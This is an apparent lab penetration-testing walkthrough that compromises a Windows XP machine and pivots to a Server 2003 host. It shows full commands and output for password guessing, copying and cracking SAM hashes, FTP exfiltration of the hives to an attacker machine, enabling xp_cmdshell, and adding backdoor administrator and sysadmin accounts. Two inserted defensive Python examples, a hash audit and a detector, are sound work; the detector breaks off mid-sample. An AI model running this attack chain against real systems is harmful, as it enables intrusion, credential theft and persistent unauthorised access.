Reconnaissance
If you want to win, you must know your environment.
Start by gathering system-related information.
C:\>systeminfo

Host Name:                 XP-INTRANET
OS Name:                   Microsoft Windows XP Professional
OS Version:                5.1.2600 Service Pack 3 Build 2600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Uniprocessor Free
Registered Owner:          User
Registered Organization:
Product ID:                76487-OEM-0060233-70102
Original Install Date:     3/1/2011, 6:18:31 PM
System Up Time:            1 Days, 22 Hours, 31 Minutes, 28 Seconds
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System type:               X86-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: x86 Family 15 Model 2 Stepping 8 GenuineIntel ~2800 Mhz
BIOS Version:              PTLTD - 6040000
Windows Directory:         C:\WINDOWS
System Directory:          C:\WINDOWS\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-us;English (United States)
Input Locale:              en-us;English (United States)
Time Zone:                 (GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     127 MB
Available Physical Memory: 28 MB
Virtual Memory: Max Size:  2,048 MB
Virtual Memory: Available: 2,008 MB
Virtual Memory: In Use:    40 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    WORKGROUP
Logon Server:              \\XP-INTRANET
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: Q147222
                           [02]: KB936929 - Service Pack
NetWork Card(s):           1 NIC(s) Installed.
                           [01]: VMware Accelerated AMD PCNet Adapter
                                 Connection Name: Local Area Connection 2
                                 DHCP Enabled:    Yes
                                 DHCP Server:     10.0.1.137
                                 IP address(es)
                                 [01]: 10.0.1.138

From the systeminfo command we can extract detailed configuration information about a computer and its operating system, including operating system configuration, security information, product ID, and hardware properties such as RAM, disk space, and network cards.
Next, we'll check the running and installed services.
Running Services
C:\>tasklist /svc

Image Name                     PID Services
========================= ====== =============================================
System Idle Process            0 N/A
System                         4 N/A
smss.exe                     536 N/A
csrss.exe                    592 N/A
winlogon.exe                 616 N/A
services.exe                 660 Eventlog, PlugPlay
lsass.exe                    672 PolicyAgent, ProtectedStorage, SamSs
vmacthlp.exe                 836 VMware Physical Disk Helper Service
logonui.exe                  848 N/A
svchost.exe                  880 DcomLaunch, TermService
svchost.exe                  968 RpcSs
svchost.exe                 1060 AudioSrv, Browser, CryptSvc, Dhcp, dmserver,
                                 ERSvc, EventSystem,
                                 FastUserSwitchingCompatibility, helpsvc,
                                 lanmanserver, lanmanworkstation, Netman, Nla,
                                 Schedule, seclogon, SENS, SharedAccess,
                                 ShellHWDetection, srservice, Themes, TrkWks,
                                 W32Time, winmgmt, wscsvc, wuauserv, WZCSVC
svchost.exe                 1192 Dnscache
svchost.exe                 1212 LmHosts, RemoteRegistry, SSDPSRV, WebClient
spoolsv.exe                 1416 Spooler
vmtoolsd.exe                1660 VMTools
VMUpgradeHelper.exe         1880 VMUpgradeHelper
alg.exe                     1808 ALG
imapi.exe                   1604 ImapiService
csrss.exe                   2692 N/A
winlogon.exe                2720 N/A
rdpclip.exe                 2916 N/A
wscntfy.exe                 2920 N/A
explorer.exe                3032 N/A
VMwareTray.exe              3352 N/A
logon.scr                   2164 N/A
cmd.exe                     2268 N/A
nc.exe                      1136 N/A
cmd.exe                     4008 N/A
tasklist.exe                2604 N/A
wmiprvse.exe                3496 N/A
Installed Services
C:\>sc query state= all

SERVICE_NAME: Alerter
DISPLAY_NAME: Alerter
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 1077  (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

SERVICE_NAME: ALG
DISPLAY_NAME: Application Layer Gateway Service
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
...
SERVICE_NAME: WinVNC4
DISPLAY_NAME: VNC Server Version 4
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
...
SERVICE_NAME: xmlprov
DISPLAY_NAME: Network Provisioning Service
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 1077  (0x435)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
From the information obtained we have a clear picture of the exploited machine, and of some system resources we can leverage, like the VNC Server seen above.
User Related Information
Current environment settings
C:\>set

ALLUSERSPROFILE=C:\Documents and Settings\All Users
APPDATA=C:\Documents and Settings\John\Application Data
CLIENTNAME=iMac
CommonProgramFiles=C:\Program Files\Common Files
COMPUTERNAME=XP-INTRANET
ComSpec=C:\WINDOWS\system32\cmd.exe
FP_NO_HOST_CHECK=NO
HOMEDRIVE=C:
HOMEPATH=\Documents and Settings\John
LOGONSERVER=\\XP-INTRANET
NUMBER_OF_PROCESSORS=1
OS=Windows_NT
Path=C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family 15 Model 2 Stepping 8, GenuineIntel
PROCESSOR_LEVEL=15
PROCESSOR_REVISION=0208
ProgramFiles=C:\Program Files
PROMPT=$P$G
SESSIONNAME=RDP-Tcp#4
SystemDrive=C:
SystemRoot=C:\WINDOWS
TEMP=C:\DOCUME~1\John\LOCALS~1\Temp
TMP=C:\DOCUME~1\John\LOCALS~1\Temp
USERDOMAIN=XP-INTRANET
USERNAME=John
USERPROFILE=C:\Documents and Settings\John
windir=C:\WINDOWS
Filtering the results
Find Username
C:\>set | find "USERNAME"
USERNAME=John
Find Domain
C:\>set | find "USERDOMAIN"
USERDOMAIN=XP-INTRANET
Find Current User Information
C:\>net user John

User name                    John
Full Name                    John
Comment
User's comment
Country code                 000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/11/2011 1:38 PM
Password expires             Never
Password changeable          9/11/2011 1:38 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   9/13/2011 8:15 PM

Logon hours allowed          All

Local Group Memberships      *Remote Desktop Users *Users
Global Group memberships     *None
The command completed successfully.
Current User Privileges
...
Local Group Memberships      *Remote Desktop Users *Users
Global Group memberships     *None
Find users with Administrator privileges on the current machine
C:\>net localgroup Administrators

Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Jack
The command completed successfully.

Note: User accounts other than the Administrator tend to have weaker passwords, so take note of the Jack account.
Privilege Escalation
Upload some useful tools using FTP
C:\>cd C:\Docume~1\John
C:\DOCUME~1\John>echo Bob>ftp.src
C:\DOCUME~1\John>echo bobisyouruncle>>ftp.src
C:\DOCUME~1\John>echo bin>>ftp.src
C:\DOCUME~1\John>echo get PsExec.exe>>ftp.src
C:\DOCUME~1\John>echo get nc.exe>>ftp.src
C:\DOCUME~1\John>echo get FPipe.exe>>ftp.src
C:\DOCUME~1\John>echo get PassList.txt>>ftp.src
C:\DOCUME~1\John>echo bye>>ftp.src
C:\DOCUME~1\John>dir
 Volume in drive C has no label.
 Volume Serial Number is CC58-320F

 Directory of C:\DOCUME~1\John

09/16/2011  11:44 AM    <DIR>          .
09/16/2011  11:44 AM    <DIR>          ..
09/15/2011  01:44 AM    <DIR>          Desktop
09/11/2011  05:35 PM    <DIR>          Favorites
09/16/2011  11:42 AM                69 ftp.src
09/14/2011  11:51 AM    <DIR>          My Documents
03/01/2011  07:10 PM    <DIR>          Start Menu
               1 File(s)             73 bytes
               6 Dir(s)   2,913,312,768 bytes free
Run the FTP client
C:\DOCUME~1\John>ftp -s:ftp.src 10.0.1.174
User (10.0.1.174:(none)):
bin
get PsExec.exe
get nc.exe
get FPipe.exe
get PassList.txt
bye
C:\DOCUME~1\John>del ftp.src
Password Guessing with PsExec
Username: Jack
Computer Name: XP-INTRANET
Password List: PassList.txt
C:\DOCUME~1\John>FOR /f %i in (PassList.txt) do @echo %i & @psexec /accepteula \\XP-INTRANET -u Jack -p %i "ipconfig" 2>nul && echo ***************** %i *****************
123456
12345
123456789
password
Password
iloveyou
P4ssw0rd1
princess
rockyou
Password123
1234567
12345678
abc123
P4ssw0rd
Nicole
Simplepass
Daniel
MyPass1
babygirl
monkey
Jessica
Lovely
michael
Ashley
Secret1
***************** Secret1 *****************
654321
Qwerty

Password for Jack: Secret1
Grabbing the SAM and System files
SAM File
C:\DOCUME~1\John>psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\sam C:\Docume~1\John\"

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

cmd.exe exited with error code 0.
System File
C:\DOCUME~1\John>psexec \\XP-INTRANET -u Jack -p Secret1 cmd.exe /c "copy C:\windows\repair\system C:\Docume~1\John\"

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

cmd.exe exited with error code 0.
Make a file containing the FTP commands
C:\DOCUME~1\John>echo Bob>ftp.src
C:\DOCUME~1\John>echo toor>>ftp.src
C:\DOCUME~1\John>echo bin>>ftp.src
C:\DOCUME~1\John>echo put sam>>ftp.src
C:\DOCUME~1\John>echo put system>>ftp.src
C:\DOCUME~1\John>echo bye>>ftp.src
Uploading the files to the attacker machine
C:\DOCUME~1\John>ftp -s:ftp.src 10.0.1.174
User (10.0.1.174:(none)):
bin
put sam
put system
bye
Password Cracking
Extract the hashes from the SAM and System files with samdump2
root@bt:~# samdump2 sam system >hashes.txt
samdump2 1.1.1 by Objectif Securite
http://www.objectif-securite.ch
original author: ncuomo@studenti.unina.it

Root Key : SAM
root@bt:~# cat hashes.txt
Administrator:500:2087ec72c3dcba83d5367c170aa9b994:b8813ba5b424db4b6dcac460d84c127b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a24902c1f8098ab6b4a2760e3a0920ab:5d6d47bbb13ca7fddc038b99a07c333d:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:b5968af5ca7feec3bc364f8bf7978c8b:::
Password cracking with John the Ripper using a wordlist
root@bt:/pentest/passwords/john# ./john --format=nt --wordlist=/root/Dicts/john.txt --rules /root/hashes.txt
Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
Secret1          (Jack)
Simplepass       (John)
P4ssw0rd         (Administrator)
guesses: 3  time: 0:00:00:00 100.00% (ETA: Fri Sep 16 21:53:18 2011)  c/s: 5591K  trying: Skidoing - Zhongguing
Passwords found:
Jack - Secret1
John - Simplepass
Administrator - P4ssw0rd
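Before any cracking, a dump in this pwdump format already tells a defender two things: whether the box still stores LM hashes (the first hash field is something other than the empty-LM constant), and which accounts have a blank password (NT field equal to the empty-NT constant). The audit below is an added example, not part of the original write-up; the four input lines are the ones samdump2 printed above, and the two constants are the well-known hashes of the empty string.

```python
"""Audit a pwdump-format hash dump (as produced by samdump2) for weak storage.

Added example, not part of the original write-up. SAMPLE_DUMP is the hashes.txt
content shown in the write-up; the checks are mine.
"""
import re

# Well-known constants: LM and NT hashes of the empty password. An LM field equal
# to EMPTY_LM means no LM hash is stored for that account, which is the state you
# want for every account (LM hashes are trivially crackable).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# pwdump line layout: user:rid:lmhash:nthash:::
PWDUMP_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

SAMPLE_DUMP = """\
Administrator:500:2087ec72c3dcba83d5367c170aa9b994:b8813ba5b424db4b6dcac460d84c127b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:a24902c1f8098ab6b4a2760e3a0920ab:5d6d47bbb13ca7fddc038b99a07c333d:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:b5968af5ca7feec3bc364f8bf7978c8b:::
"""


def parse_pwdump(text):
    """Parse pwdump lines into dicts; malformed lines raise instead of being skipped."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        line = line.strip()
        if not line:
            continue
        m = PWDUMP_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno}: not pwdump format: {line!r}")
        user, rid, lm, nt = m.groups()
        entries.append({"user": user, "rid": int(rid), "lm": lm.lower(), "nt": nt.lower()})
    return entries


def audit(entries):
    """Return (account, finding) pairs for LM storage, blank passwords and shared hashes."""
    findings = []
    by_nt = {}
    for e in entries:
        if e["lm"] != EMPTY_LM:
            findings.append((e["user"], "LM hash stored"))
        if e["nt"] == EMPTY_NT:
            findings.append((e["user"], "blank password"))
        else:
            # Identical NT hashes mean identical passwords (NT hashes are unsalted).
            by_nt.setdefault(e["nt"], []).append(e["user"])
    for users in by_nt.values():
        if len(users) > 1:
            findings.append((", ".join(users), "same NT hash (shared password)"))
    return findings


if __name__ == "__main__":
    for account, finding in audit(parse_pwdump(SAMPLE_DUMP)):
        print(f"{account}: {finding}")
```

On the dump above this reports LM storage for Administrator and HelpAssistant and a blank password for Guest; SUPPORT_388945a0 has no LM hash stored and is not reported.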
Persistence
Start stopped Services to maintain access
Back to the VNC Server Version 4 found previously.
Check the service state
C:\DOCUME~1\John>sc query WinVNC4

SERVICE_NAME: WinVNC4
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        STATE              : 1  STOPPED
                                (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
Start the service
C:\DOCUME~1\John>psexec -u Jack -p Secret1 sc start WinVNC4

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

sc exited with error code 0.
Check the service state
C:\DOCUME~1\John>sc query WinVNC4

SERVICE_NAME: WinVNC4
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        STATE              : 4  RUNNING
                                (STOPPABLE,NOT_PAUSABLE,ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
Grab VNC Password
C:\DOCUME~1\John>psexec -u Jack -p Secret1 reg export HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 C:\docume~1\John\vnc.reg

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

reg exited with error code 0.
View the encrypted VNC password
C:\DOCUME~1\John>type vnc.reg
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4]
"Password"=hex:79,9a,a1,cb,85,e9,79,db
"SecurityTypes"="VncAuth"
"ReverseSecurityTypes"="None"
"QueryConnect"=dword:00000000
"QueryOnlyIfLoggedOn"=dword:00000000
VNC hash: 799aa1cb85e979db
Decrypt the VNC hash on the attacker machine with vncdec.exe
C:\>vncdec.exe 799aa1cb85e979db
----------------------------------
RealVNC Password Decrypter
by Jonas Piela, www.jonaspiela.de
----------------------------------
running in hash mode...
----------------------------------
decrypted password: VNCPass
----------------------------------
Testing the connection with vncviewer
root@bt:~# vncviewer 10.0.1.138
Connected to RFB server, using protocol version 3.8
Performing standard VNC authentication
Password:
Authentication successful
Desktop name "XP-INTRANET"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Enable telnet server on the target machine
Note: I advise against using telnet as a persistence method, because telnet transmits data in plain readable text. Use SSH instead; in these examples the goal is to introduce the least amount of tools on the target machines, so I'll use telnet.
C:\DOCUME~1\John>psexec -u Jack -p Secret1 sc config tlntsvr start= auto

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

sc exited with error code 0.
Start the Telnet server
C:\DOCUME~1\John>psexec -u Jack -p Secret1 sc start tlntsvr

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

sc exited with error code 0.
Add a rule to the firewall (scoped to the attacker's address only)
C:\DOCUME~1\John>psexec -u Jack -p Secret1 netsh firewall add portopening protocol = TCP port = 23 name = Telnet mode = enable scope = custom address = 10.0.1.174

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

netsh exited with error code 0.
Telnet to the target machine
root@bt:~# telnet 10.0.1.138
Trying 10.0.1.138...
Connected to 10.0.1.138.
Escape character is '^]'.
Welcome to Microsoft Telnet Service

login: Jack
password:

*=====================================
Welcome to Microsoft Telnet Server.
*=====================================
C:\Documents and Settings\Jack>
More Recon & Mapping
Gather Network Information
C:\Documents and Settings\Jack>cd C:\
C:\>ipconfig /all

Windows IP Configuration

        Host Name . . . . . . . . . . . . : XP-INTRANET
        Primary Dns Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No
        DNS Suffix Search List. . . . . . : lab2-intranet

Ethernet adapter Local Area Connection 1:

        Connection-specific DNS Suffix  . : lab2-intranet
        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
        Physical Address. . . . . . . . . : 00-0C-29-B3-5C-13
        Dhcp Enabled. . . . . . . . . . . : Yes
        Autoconfiguration Enabled . . . . : Yes
        IP Address. . . . . . . . . . . . : 10.0.1.138
        Subnet Mask . . . . . . . . . . . : 255.255.255.248
        Default Gateway . . . . . . . . . : 10.0.1.137
        DHCP Server . . . . . . . . . . . : 10.0.1.137
        DNS Servers . . . . . . . . . . . : 10.0.1.137
        Lease Obtained. . . . . . . . . . : Saturday, September 17, 2011 5:23:04 PM
        Lease Expires . . . . . . . . . . : Saturday, September 17, 2011 7:23:04 PM
Gather DNS Information
C:\>ipconfig /displaydns

Windows IP Configuration

         1.0.0.127.in-addr.arpa
         ----------------------------------------
         Record Name . . . . . : 1.0.0.127.in-addr.arpa.
         Record Type . . . . . : 12
         Time To Live  . . . . : 553930
         Data Length . . . . . : 4
         Section . . . . . . . : Answer
         PTR Record  . . . . . : localhost

         174.1.0.10.in-addr.arpa
         ----------------------------------------
         Name does not exist.

         localhost
         ----------------------------------------
         Record Name . . . . . : localhost
         Record Type . . . . . : 1
         Time To Live  . . . . : 553930
         Data Length . . . . . : 4
         Section . . . . . . . : Answer
         A (Host) Record . . . : 127.0.0.1
Find Shared Computers and Resources
C:\>net view
Server Name            Remark
-------------------------------------------------------------------------------
\\SERVER-2003          Server 2003
\\XP-INTRANET          Windows-XP
The command completed successfully.
Finding more information about the SERVER-2003 machine
C:\>nslookup SERVER-2003
*** pfsense.lab2-intranet can't find SERVER-2003: Non-existent domain
Server:  pfsense.lab2-intranet
Address:  10.0.1.137
No luck here; let's try using arp.
C:\>arp -a

Interface: 10.0.1.138 --- 0x2
  Internet Address      Physical Address      Type
  10.0.1.137            00-0c-29-8d-ca-6f     dynamic
Use the arp command with * to delete all cached entries, then initiate a connection to the SERVER-2003 machine so its address gets resolved again.
C:\>arp -d
C:\>net use \\SERVER-2003
Enter the user name for 'SERVER-2003':
System error 1223 has occurred.

The operation was canceled by the user.
The password or user name is invalid for \\SERVER-2003.
Check the arp table again; if the network isn't too busy, we should now have the SERVER-2003 machine's IP address.
C:\>arp -a

Interface: 10.0.1.138 --- 0x2
  Internet Address      Physical Address      Type
  10.0.1.137            00-0c-29-8d-ca-6f     dynamic
  10.0.1.140            00-0c-29-c0-07-e4     dynamic
We got lucky: the Server 2003 IP address is 10.0.1.140.
Let's port scan the Server 2003 machine
C:\>FOR /L %i in (1,1,6000) do @netsh.exe diag connect iphost 10.0.1.140 %i | find "[%i]"
Server appears to be running on port(s) [21]
Server appears to be running on port(s) [53]
Server appears to be running on port(s) [80]
Server appears to be running on port(s) [135]
Server appears to be running on port(s) [139]
Server appears to be running on port(s) [445]
Server appears to be running on port(s) [1025]
Server appears to be running on port(s) [1026]
Server appears to be running on port(s) [1032]
Server appears to be running on port(s) [1200]
Server appears to be running on port(s) [1433]
Server appears to be running on port(s) [3389]
Server appears to be running on port(s) [5800]
Server appears to be running on port(s) [5900]

Open ports found: 21, 53, 80, 135, 139, 445, 1025, 1026, 1032, 1200, 1433, 3389, 5800, 5900.
Let's check port 1433 (MSSQL).
Pivoting
Port Redirection with FPipe
Add a rule to the firewall on the XP machine
C:\>netsh firewall add portopening protocol = TCP port = 5555 name = PortForward mode = enable scope = custom address = 10.0.1.174
Ok.
Redirect local port 5555 to port 1433 on the Server 2003 machine
C:\DOCUME~1\John>FPipe.exe -L 5555 -r 1433 10.0.1.140
FPipe v2.1 - TCP/UDP port redirector.
Copyright 2000 (c) by Foundstone, Inc.
http://www.foundstone.com
Password Guessing with THC-Hydra
root@bt:~# hydra -s 5555 -V -l sa -P PassList.txt -t 1 -w 60 -f 10.0.1.138 mssql
Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2011-09-18 05:04:16
[DATA] 1 tasks, 1 servers, 28 login tries (l:1/p:28), ~28 tries per task
[DATA] attacking service mssql on port 5555
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "sa" - child 0 - 1 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "123456" - child 0 - 2 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "12345" - child 0 - 3 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "123456789" - child 0 - 4 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "Password" - child 0 - 5 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "iloveyou" - child 0 - 6 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "P4ssw0rd1" - child 0 - 7 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "princess" - child 0 - 8 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "rockyou" - child 0 - 9 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "Password123" - child 0 - 10 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "1234567" - child 0 - 11 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "12345678" - child 0 - 12 of 28
[ATTEMPT] target 10.0.1.138 - login "sa" - pass "password1" - child 0 - 13 of 28
[5555][mssql] host: 10.0.1.138   login: sa   password: password1
[STATUS] attack finished for 10.0.1.138 (valid pair found)
Hydra (http://www.thc.org/thc-hydra) finished at 2011-09-18 05:04:19

login: sa
password: password1
Stored Procedure Attack using tsql
Connecting to the SQL service
root@bt:~# tsql -H 10.0.1.138 -U sa -p 5555
locale is "en_US.UTF-8"
locale charset is "UTF-8"
Password:
1> exec xp_cmdshell 'whoami';
2> go
Msg 15281, Level 16, State 1, Server SERVER-2003\SQLEXPRESS, Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', see "Surface Area Configuration" in SQL Server Books Online.
Using sp_configure to re-enable the stored procedure
1> EXEC sp_configure 'show advanced options',1
2> go
Msg 15457, Level 0, State 1, Server SERVER-2003\SQLEXPRESS, Line 163
Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> RECONFIGURE
2> go
1> EXEC sp_configure 'xp_cmdshell',1
2> go
Msg 15457, Level 0, State 1, Server SERVER-2003\SQLEXPRESS, Line 163
Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> RECONFIGURE
2> go
1> exec xp_cmdshell 'whoami';
2> go
output
nt authority\system
NULL
(2 rows affected)
(return status = 0)
1> xp_msver 'ProductName'
2> go
Index  Name         Internal_Value  Character_Value
1      ProductName  NULL            Microsoft SQL Server
(1 row affected)
(return status = 1)
Adding a Local Administrator
Username: IWAM_NETASPS
Password: $ecretP4$$
1> xp_cmdshell 'net user IWAM_NETASPS $ecretP4$$ /add'
2> go
output
The command completed successfully.
NULL
NULL
(3 rows affected)
(return status = 0)
1> xp_cmdshell 'net localgroup administrators IWAM_NETASPS /add'
2> go
output
The command completed successfully.
NULL
NULL
(3 rows affected)
(return status = 0)
Persistence - Keeping sysadmin-level access
Username: iKuppu
Password: 123P4$$
1> sp_addlogin 'iKuppu','123P4$$'
2> go
(return status = 0)
1> sp_addsrvrolemember 'iKuppu','sysadmin'
2> go
(return status = 0)
Grab the SAM and System files stored in the Registry from Server 2003
Back to the XP machine
First, set up an SMB session
C:\DOCUME~1\John>net use \\SERVER-2003 $ecretP4$$ /u:IWAM_NETASPS
The command completed successfully.
Find a shared folder
C:\DOCUME~1\John>net view \\SERVER-2003
Shared resources at \\SERVER-2003

Server 2003

Share name  Type  Used as  Comment
-------------------------------------------------------------------------------
FTP         Disk
Shares      Disk
The command completed successfully.
C:\DOCUME~1\John>net use * \\SERVER-2003\Shares
Drive Z: is now connected to \\SERVER-2003\Shares.

The command completed successfully.
Now let's use PsExec to open a shell on the Server 2003 machine and save the hives into the share with the reg command.
C:\DOCUME~1\John>psexec \\SERVER-2003 -u IWAM_NETASPS -p $ecretP4$$ cmd.exe

PsExec v1.98 - Execute processes remotely
Copyright (C) 2001-2010 Mark Russinovich
Sysinternals - www.sysinternals.com

Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>cd C:\
C:\>dir
 Volume in drive C has no label.
 Volume Serial Number is 7083-1B0B

 Directory of C:\

09/11/2011  09:58 PM                 0 AUTOEXEC.BAT
09/11/2011  09:58 PM                 0 CONFIG.SYS
05/29/2011  10:52 PM    <DIR>          Documents and Settings
09/12/2011  12:08 AM    <DIR>          FPSE_search
06/01/2011  04:52 AM    <DIR>          FTP
09/11/2011  05:44 PM    <DIR>          Inetpub
05/29/2011  04:41 AM    <DIR>          Program Files
06/04/2011  04:34 AM    <DIR>          Shares
06/04/2011  04:56 AM    <DIR>          WINDOWS
09/11/2011  09:59 PM    <DIR>          wmpub
               3 File(s)         61,440 bytes
               8 Dir(s)   5,891,756,032 bytes free

C:\>cd Shares
C:\Shares>reg save HKLM\SAM SAM
The operation completed successfully.
C:\Shares>reg save HKLM\System System
The operation completed successfully.
C:\Shares>exit
cmd.exe exited on SERVER-2003 with error code 0.
The last step is to upload the files to the attacker machine.
C:\DOCUME~1\John>ftp 10.0.1.174
Connected to 10.0.1.174.
220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
220-You are user number 1 of 50 allowed.
220-Local time is now 12:01. Server port: 21.
220-This is a private system - No anonymous login
220-IPv6 connections are also welcome on this server.
220 You will be disconnected after 15 minutes of inactivity.
User (10.0.1.174:(none)): Bob
331 User Bob OK. Password required
Password:
230-User Bob has group access to:  1001
230 OK. Current directory is /
ftp> bin
200 TYPE is now 8-bit binary
ftp> put Z:\SAM
200 PORT command successful
150 Connecting to port 5001
226-File successfully transferred
226 0.089 seconds (measured here), 451.25 Kbytes per second
ftp: 40960 bytes sent in 0.01Seconds 2730.67Kbytes/sec.
ftp> put Z:\System
200 PORT command successful
150 Connecting to port 5002
226-File successfully transferred
226 3.300 seconds (measured here), 0.69 Mbytes per second
ftp: 2404352 bytes sent in 3.20Seconds 750.42Kbytes/sec.
ftp> bye
221-Goodbye. You uploaded 2385 and downloaded 0 kbytes.
221 Logout.
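Every step taken so far on XP-INTRANET and SERVER-2003 (the repair\sam copy and sc/netsh changes via PsExec, the net user additions through xp_cmdshell, the reg save of the hives) leaves a process-creation record with a tell-tale parent or command line. The detector below is an added example, not part of the original write-up; the event records are constructed in a simplified pipe-delimited form (not a real Sysmon or EDR export) and carry the commands shown above.

```python
"""Flag the lateral-movement and persistence commands from this write-up in
process-creation telemetry.

Added example, not part of the original write-up. SAMPLE_EVENTS is constructed
(simplified pipe-delimited records, not a real Sysmon/EDR export); field order is
timestamp|host|user|parent_image|image|command_line.
"""
import re

SAMPLE_EVENTS = r"""
2011-09-16T11:50:01|XP-INTRANET|XP-INTRANET\Jack|C:\WINDOWS\PSEXESVC.exe|C:\WINDOWS\system32\cmd.exe|cmd.exe /c "copy C:\windows\repair\sam C:\Docume~1\John\"
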